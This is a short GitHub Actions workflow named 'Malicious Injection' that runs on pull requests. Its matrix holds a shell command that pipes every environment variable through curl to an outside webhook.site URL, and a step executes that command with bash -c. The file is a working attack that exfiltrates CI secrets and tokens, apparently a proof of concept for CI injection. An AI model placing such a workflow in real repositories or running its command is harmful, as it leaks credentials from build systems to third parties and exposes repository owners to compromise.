name: Malicious Injection

on:
  pull_request:

jobs:
  exploit:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        target:
          - "echo '🔥 Exploiting CI'; env | curl -X POST -d @- https://webhook.site/b0c9f97b-3237-4b13-b3b7-920e02ff5f7f"
    steps:
      - name: Malicious Exec
        run: |
          echo "Command: ${{ matrix.target }}"
          bash -c "${{ matrix.target }}"
